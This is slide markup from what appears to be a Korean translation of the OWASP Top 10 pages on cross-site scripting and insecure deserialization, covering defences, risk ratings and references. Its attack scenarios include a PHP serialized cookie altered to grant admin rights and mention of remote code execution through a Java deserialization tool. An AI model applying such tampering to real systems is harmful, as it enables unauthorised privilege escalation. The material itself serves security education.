클라이언트 측면의 공격과 같은 사용자 브라우저에 대한 공격을 포함합니다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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8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OWASP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/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Encode Data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/>
              </a:rPr>
              <a:t>OWASP Proactive Controls: Validate Data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5"/>
              </a:rPr>
              <a:t>OWASP Application Security Verification Standard: V5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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Reflected XSS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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Stored XSS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8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for DOM XSS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9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XSS Prevention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0"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: DOM based XSS Prevention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1"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet: XSS Filter Evasion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2"/>
              </a:rPr>
              <a:t>OWASP Java Encoder Project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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13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4"/>
              </a:rPr>
              <a:t>CWE-79: Improper neutralization of user supplied input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PortSwigger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: Client-side template injection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+mj-ea"/>
              <a:ea typeface="+mj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를 방지하려면 신뢰할 수 없는 데이터를 사용 중인 브라우저 컨텐츠와 분리해야 합니다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이것은 다음에 의해 달성될 수 있습니다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최신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Ruby on Rails, React JS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와 같이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를 자동으로 필터링 처리하는 프레임워크를 사용합니다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각 프레임워크의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XSS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보호의 한계를 알아보고 다루지 않은 사용 사례들을 적절히 처리하기 바랍니다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 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HTML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출력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본문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속성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자바스크립트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, CSS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혹은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URL)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내 컨텍스트 기반으로 신뢰할 수 없는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HTTP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요청 데이터를 필터링하며 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1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리플렉티드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 및 저장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XSS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취약점이 해결됩니다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요구되는 데이터 필터링 기술에 대한 상세 내용은</a:t>
            </a:r>
            <a:r>
              <a:rPr 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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1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치트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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 시트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 'XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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방어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9"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr 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을 참고 바랍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr 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클라이언트 측에서 브라우저 문서를 수정할 때 상황에 맞는 인코딩을 적용하면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DOM XSS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에 대해 대응할 수 있습니다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이것으로 방어할 수 없는 경우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,</a:t>
            </a:r>
            <a:r>
              <a:rPr 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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1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치트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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 시트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 'DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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기반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 XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" alt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방어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  <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6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에서 기술된 바와 같이 브라우저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API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에 유사한 문맥 감지 필터링 기술을 적용할 수 있습니다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.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea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6"/>
              </a:rPr>
              <a:t>컨텐츠 보안 정책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6"/>
              </a:rPr>
              <a:t>(CSP)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의 활성화는 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XSS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에 대한 심층적인 방어 통제입니다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로컬 파일 첨부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경로 조작 덮어 쓰기 또는 허용된 콘텐츠 제공 네트워크의 취약한 라이브러리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를 통해 악성코드를 배치할 수 있는 다른 취약점이 없는 경우라면 효과적입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24292E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rgbClr val="24292E"/>
              </a:solidFill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A7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크로스 사이트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>스크립팅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t> (XSS)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70573"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="21024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0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100" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs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자동화된 도구는 세 가지 유형의 모든 크로스 사이트 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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(XSS)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취약점을 탐지하거나 악용할 수 있습니다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그리고 자유롭게 활용 가능한 공격 프레임워크가 있습니다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크로스 사이트 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="9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(XSS)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TOP10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두 번째로 많이 발생하는 문제이며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모든 응용 프로그램의 약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2/3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발견됩니다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자동화된 도구는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PHP, J2EE/JSP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및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ASP.NET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과 같은 성숙된 기술에서 자동으로 몇 가지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XSS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문제점들을 찾을 수 있습니다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크로스 사이트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(XSS)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영향은 피해자의 브라우저 상에서 원격 코드 실행으로 인증 혹은 세션 정보를 훔치거나 피해자에게 악성코드를 전달하는 것과 같이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비지속성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리플렉티드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DOM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XSS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 중간 정도이고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저장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지속성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 XSS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대해서는 심각하다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0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1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2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4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B92E0831-F693-4B2A-BD3E-C0419888FC64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44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0800" y="3132000"/>
            <a:ext cx="3383400" cy="3168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54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ea typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>취약점 확인 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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altLang="ko-KR" sz="200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="+mn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ko-KR" altLang="en-US" sz="2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애플리케이션 및 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API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가 공격자의 악의적이거나 변조된 객체를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>역직렬화하면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 취약해질 수 있습니다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.</a:t>
            </a:r>
          </a:p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이로 인해 크게 두가지 유형의 공격이 발생할 수 있습니다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: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1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객체 및 데이터 구조 관련 공격입니다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공격자가 애플리케이션 로직을 수정하거나 애플리케이션에 사용 가능한 클래스가 있는 경우 임의의 원격 코드를 실행하여 역직렬화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중이나 이후에 동작을 변경할 수 있습니다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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1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접근 통제 관련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공격과 같이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기존 데이터 구조가 사용되지만 내용이 변경되는 일반적인 데이터 변조 공격입니다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endParaRPr sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-69850">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buSzPct val="122222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직렬화는 다음 용도의 애플리케이션에서 사용될 수 있습니다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:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="0" indent="-82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solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RPC(Remote-Process Communication)/IPC(Inter-Process Communication)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유선 프로토콜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웹 서비스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메세지 브로커 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 err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>캐싱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/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지속 연결</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1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데이터베이스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캐시 서버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파일 시스템</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="1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HTTP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쿠키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HTML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양식 파라미터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>인증 토큰</a:t>
            </a:r>
            <a:b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0800" y="6372000"/>
            <a:ext cx="3383400" cy="2761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54000" rIns="36000" bIns="36000" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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ea typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>공격 시나리오 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#1: React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>애플리케이션은 일련의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Spring Boot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>마이크로 서비스를 호출합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기능적 프로그래머이기 때문에 코드가 변경되지 않도록 노력했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이들이 제기한 해결책은 사용자 상태를 일련 번호로 변환하고 각 요청과 함께 앞뒤로 전달하는 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>공격자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"R00“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>자바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>객체 서명을 확인하고 자바</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>직렬 킬러 도구를 사용하여 애플리케이션 서버에서 원격 코드 실행을 얻습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p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850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2: PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>포럼은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>객체 직렬화를 사용하여 사용자의 사용자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>역할</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>암호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>해시 및 기타 상태를 포함하는 “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>super“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쿠키를 저장합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="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a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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</a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="111111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="111111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="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69850">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buSzPct val="122222"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>공격자는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>직렬화된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 객체를 변경하여 관리자 권한을 부여합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="-69850">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buSzPct val="122222"/>
            </a:pP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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1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Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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   i:3;s:32:"b6a8b3bea87fe0e05022f8f3c88bc960";}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368" name="Shape 368"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463200" y="6372000"/>
            <a:ext cx="3383400" cy="2761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54000" rIns="36000" bIns="36000" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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SzPct val="25000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Exo 2"/>
              <a:sym typeface="Exo 2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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>OWASP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OWASP Cheat Sheet: Deserialization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OWASP Proactive Controls: Validate All Inputs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OWASP Application Security Verification Standard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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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AppSecEU</a:t>
            </a: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2016: Surviving the Java Deserialization Apocalypse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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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AppSecUSA</a:t>
            </a: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2017: Friday the 13th JSON Attacks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SzPct val="25000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2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SzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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CWE-502: Deserialization of Untrusted Data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Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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Unmarshaller</a:t>
            </a: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 Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" marR="0" lvl="0" indent="-8280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OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="9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AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 Cali 2015: Marshalling Pickles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="0" indent="-171450" algn="l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00" u="sng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463200" y="3132000"/>
            <a:ext cx="3383400" cy="3168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54000" rIns="468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보안 대책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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altLang="ko-KR" sz="2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sz="2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122222"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>신뢰할 수 없는 출처로부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>직렬화된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 객체를 허용하지 않거나 원시 데이터 유형만을 허용하는 직렬화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매체를 사용하는 것이 안전한 아키텍처의 유일한 패턴입니다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22222"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>그럴 수 없다면 다음 중 하나 이상을 고려하십시오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</a:rPr>
              <a:t>악성 객체 생성이나 데이터 변조를 방지하기 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>직렬화된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 객체에 대한 디지털 서명과 같은 무결성 검사를 구현합니다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</a:rPr>
              <a:t>객체 생성 전 코드가 일반적으로 정의할 수 있는 클래스 집합을 기대하므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>역직렬화하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 동안 엄격한 형식 제약 조건을 적용합니다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이 기법에 대한 우회가 입증되었으므로 여기에 의존하는 것은 바람직하지 않습니다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</a:rPr>
              <a:t>가능하다면 낮은 권한 환경에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>역직렬화하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 코드를 분리하여 실행합니다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</a:rPr>
              <a:t>예상하지 않은 형식이 들어올 경우나 역직렬화가 예외를 생성할 경우 등 예외나 실패에 대한 로그를 남깁니다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 err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>역직렬화하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 컨테이너 또는 서버에서 들어오고 나가는 네 트워크 연결을 제한하거나 모니터링 합니다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900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>역직렬화를 모니터링하여 사용자가 역직렬화를 지속적으로 할 경우에 경고합니다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1295400" cy="831000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="8327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54000" tIns="216000" rIns="54000" bIns="36000" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="-2540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0909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371600" y="76199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177800">
              <a:lnSpc>
                <a:spcPct val="107142"/>
              </a:lnSpc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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>안전하지 않은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
              </a:rPr>
              <a:t>역직렬화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" cap="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7F7F7F"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:cs typeface="Exo 2"/>
              <a:sym typeface="Exo 2"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2700872576"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="957600"/>
          <a:ext cx="6836400" cy="2183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909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 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18000" marR="1800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altLang="en-US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확산 정도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 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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탐지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 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909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기술: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u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역직렬화의 공격은 다소 어렵습니다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유통되는 공격 코드는 기본 공격 코드의 변경이나 수정없이 거의 작동하지 않기 때문입니다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 </a:t>
                      </a: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 문제는 수치화된 정보가 아닌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  <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
